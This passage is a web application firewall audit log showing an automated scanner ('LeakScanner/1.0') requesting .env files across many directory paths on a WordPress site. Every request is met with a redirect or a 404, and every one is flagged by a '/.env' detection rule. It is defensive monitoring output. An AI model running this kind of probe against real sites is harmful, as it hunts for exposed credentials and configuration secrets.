[rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/private/.env"] [unique_id "aE6ckA9BijgXpeeI_r-2XAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982352576561 612804 (- - -) Stopwatch2: 1749982352576561 612804; combined=1565, p1=325, p2=1163, p3=0, p4=0, p5=76, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --952b067c-Z-- --62b06115-A-- [15/Jun/2025:15:42:34.999013 +0530] aE6ckcZRGs9Zs5Qd_koV7AAAAAA 83.217.210.41 36536 127.0.0.1 7081 --62b06115-B-- GET /private/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//private/.env accept-encoding: gzip --62b06115-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --62b06115-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/private/.env"] [unique_id "aE6ckcZRGs9Zs5Qd_koV7AAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982353761859 1237226 (- - -) Stopwatch2: 1749982353761859 1237226; combined=1619, p1=354, p2=1174, p3=0, p4=0, p5=90, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --62b06115-Z-- --7dbfc753-A-- [15/Jun/2025:15:42:35.599329 +0530] aE6ck315LOn2YRwTZIgCfAAAAAc 83.217.210.41 36558 127.0.0.1 7081 --7dbfc753-B-- GET //public/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --7dbfc753-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/public/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --7dbfc753-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/public/.env"] [unique_id "aE6ck315LOn2YRwTZIgCfAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982355009104 590288 (- - -) Stopwatch2: 1749982355009104 590288; combined=1736, p1=491, p2=1158, p3=0, p4=0, p5=86, sr=159, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7dbfc753-Z-- --adc4802d-A-- [15/Jun/2025:15:42:37.329463 +0530] aE6clA9BijgXpeeI_r-2XQAAAAE 83.217.210.41 36578 127.0.0.1 7081 --adc4802d-B-- GET /public/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close referer: https://arch.cstechns.com//public/.env user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --adc4802d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --adc4802d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/public/.env"] [unique_id "aE6clA9BijgXpeeI_r-2XQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982356118355 1211194 (- - -) Stopwatch2: 1749982356118355 1211194; combined=1778, p1=404, p2=1256, p3=0, p4=0, p5=118, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --adc4802d-Z-- --019fdc29-A-- [15/Jun/2025:15:42:37.868218 +0530] aE6clcZRGs9Zs5Qd_koV7QAAAAA 83.217.210.41 36646 127.0.0.1 7081 --019fdc29-B-- GET //src/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --019fdc29-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/src/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --019fdc29-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/src/.env"] [unique_id "aE6clcZRGs9Zs5Qd_koV7QAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982357265209 603088 (- - -) Stopwatch2: 1749982357265209 603088; combined=2532, p1=473, p2=1930, p3=0, p4=0, p5=128, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --019fdc29-Z-- --dfe84047-A-- [15/Jun/2025:15:42:39.668296 +0530] aE6cluvhFIArpJWr_ioNoQAAAAU 83.217.210.41 36688 127.0.0.1 7081 --dfe84047-B-- GET /src/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//src/.env accept-encoding: gzip --dfe84047-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --dfe84047-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/src/.env"] [unique_id "aE6cluvhFIArpJWr_ioNoQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982358412274 1256084 (- - -) Stopwatch2: 1749982358412274 1256084; combined=2094, p1=422, p2=1586, p3=0, p4=0, p5=85, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dfe84047-Z-- --d194a969-A-- [15/Jun/2025:15:42:40.248193 +0530] aE6cl8ZRGs9Zs5Qd_koV7gAAAAA 83.217.210.41 55124 127.0.0.1 7081 --d194a969-B-- GET //app/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --d194a969-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/app/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --d194a969-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/app/.env"] [unique_id "aE6cl8ZRGs9Zs5Qd_koV7gAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982359652948 595309 (- - -) Stopwatch2: 1749982359652948 595309; combined=1978, p1=446, p2=1447, p3=0, p4=0, p5=84, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d194a969-Z-- --180ed978-A-- [15/Jun/2025:15:42:42.033461 +0530] aE6cmDr2XEdSo0rTaLVmhAAAAAg 83.217.210.41 55158 127.0.0.1 7081 --180ed978-B-- GET /app/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//app/.env accept-encoding: gzip --180ed978-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --180ed978-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/app/.env"] [unique_id "aE6cmDr2XEdSo0rTaLVmhAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982360793677 1239845 (- - -) Stopwatch2: 1749982360793677 1239845; combined=1630, p1=377, p2=1156, p3=0, p4=0, p5=97, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --180ed978-Z-- --e248635e-A-- [15/Jun/2025:15:42:42.733263 +0530] aE6cmg9BijgXpeeI_r-2XwAAAAE 83.217.210.41 55186 127.0.0.1 7081 --e248635e-B-- GET //internal/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --e248635e-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/internal/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --e248635e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/internal/.env"] [unique_id "aE6cmg9BijgXpeeI_r-2XwAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982362138836 594518 (- - -) Stopwatch2: 1749982362138836 594518; combined=1538, p1=283, p2=1162, p3=0, p4=0, p5=92, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e248635e-Z-- --12ffad53-A-- [15/Jun/2025:15:42:44.576117 +0530] aE6cmzQchg8T7fp9tjNt3AAAAAI 83.217.210.41 55200 127.0.0.1 7081 --12ffad53-B-- GET /internal/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//internal/.env accept-encoding: gzip --12ffad53-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --12ffad53-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/internal/.env"] [unique_id "aE6cmzQchg8T7fp9tjNt3AAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982363356194 1219985 (- - -) Stopwatch2: 1749982363356194 1219985; combined=1841, p1=385, p2=1356, p3=0, p4=0, p5=99, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --12ffad53-Z-- --a488243c-A-- [15/Jun/2025:15:42:55.240634 +0530] aE6cpsZRGs9Zs5Qd_koV8wAAAAA 83.217.210.41 51160 127.0.0.1 7081 --a488243c-B-- GET //system/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --a488243c-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/system/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --a488243c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/system/.env"] [unique_id "aE6cpsZRGs9Zs5Qd_koV8wAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982374645428 595298 (- - -) Stopwatch2: 1749982374645428 595298; combined=2562, p1=532, p2=1918, p3=0, p4=0, p5=111, sr=133, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a488243c-Z-- --c51cf431-A-- [15/Jun/2025:15:42:57.097139 +0530] aE6cp-vhFIArpJWr_ioNpwAAAAU 83.217.210.41 51222 127.0.0.1 7081 --c51cf431-B-- GET /system/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//system/.env accept-encoding: gzip --c51cf431-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --c51cf431-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/system/.env"] [unique_id "aE6cp-vhFIArpJWr_ioNpwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982375861417 1235784 (- - -) Stopwatch2: 1749982375861417 1235784; combined=1944, p1=376, p2=1465, p3=0, p4=0, p5=102, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c51cf431-Z-- --c23b153b-A-- [15/Jun/2025:15:42:57.630113 +0530] aE6cqTQchg8T7fp9tjNt4QAAAAI 83.217.210.41 51274 127.0.0.1 7081 --c23b153b-B-- GET //environments/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --c23b153b-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/environments/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c23b153b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/environments/.env"] [unique_id "aE6cqTQchg8T7fp9tjNt4QAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982377040411 589767 (- - -) Stopwatch2: 1749982377040411 589767; combined=1633, p1=364, p2=1162, p3=0, p4=0, p5=107, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c23b153b-Z-- --f4805009-A-- [15/Jun/2025:15:42:59.333958 +0530] aE6cqhRnvL96XFagPFCv1AAAAAY 83.217.210.41 51314 127.0.0.1 7081 --f4805009-B-- GET /environments/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//environments/.env accept-encoding: gzip --f4805009-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --f4805009-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/environments/.env"] [unique_id "aE6cqhRnvL96XFagPFCv1AAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982378102064 1231994 (- - -) Stopwatch2: 1749982378102064 1231994; combined=2519, p1=503, p2=1896, p3=0, p4=0, p5=120, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f4805009-Z-- --f572b02a-A-- [15/Jun/2025:15:42:59.779092 +0530] aE6cq-vhFIArpJWr_ioNqAAAAAU 83.217.210.41 51364 127.0.0.1 7081 --f572b02a-B-- GET //api/v1/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --f572b02a-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/api/v1/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --f572b02a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/api/v1/.env"] [unique_id "aE6cq-vhFIArpJWr_ioNqAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982379161055 618115 (- - -) Stopwatch2: 1749982379161055 618115; combined=1889, p1=396, p2=1391, p3=0, p4=0, p5=101, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f572b02a-Z-- --45c57436-A-- [15/Jun/2025:15:43:01.520804 +0530] aE6crH15LOn2YRwTZIgChQAAAAc 83.217.210.41 51332 127.0.0.1 7081 --45c57436-B-- GET /api/v1/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//api/v1/.env accept-encoding: gzip --45c57436-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --45c57436-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/api/v1/.env"] [unique_id "aE6crH15LOn2YRwTZIgChQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982380181279 1339614 (- - -) Stopwatch2: 1749982380181279 1339614; combined=2346, p1=469, p2=1760, p3=0, p4=0, p5=116, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --45c57436-Z-- --3a02a163-A-- [15/Jun/2025:15:43:07.088514 +0530] aE6csjQchg8T7fp9tjNt5AAAAAI 83.217.210.41 51914 127.0.0.1 7081 --3a02a163-B-- GET //config/dev/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --3a02a163-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT 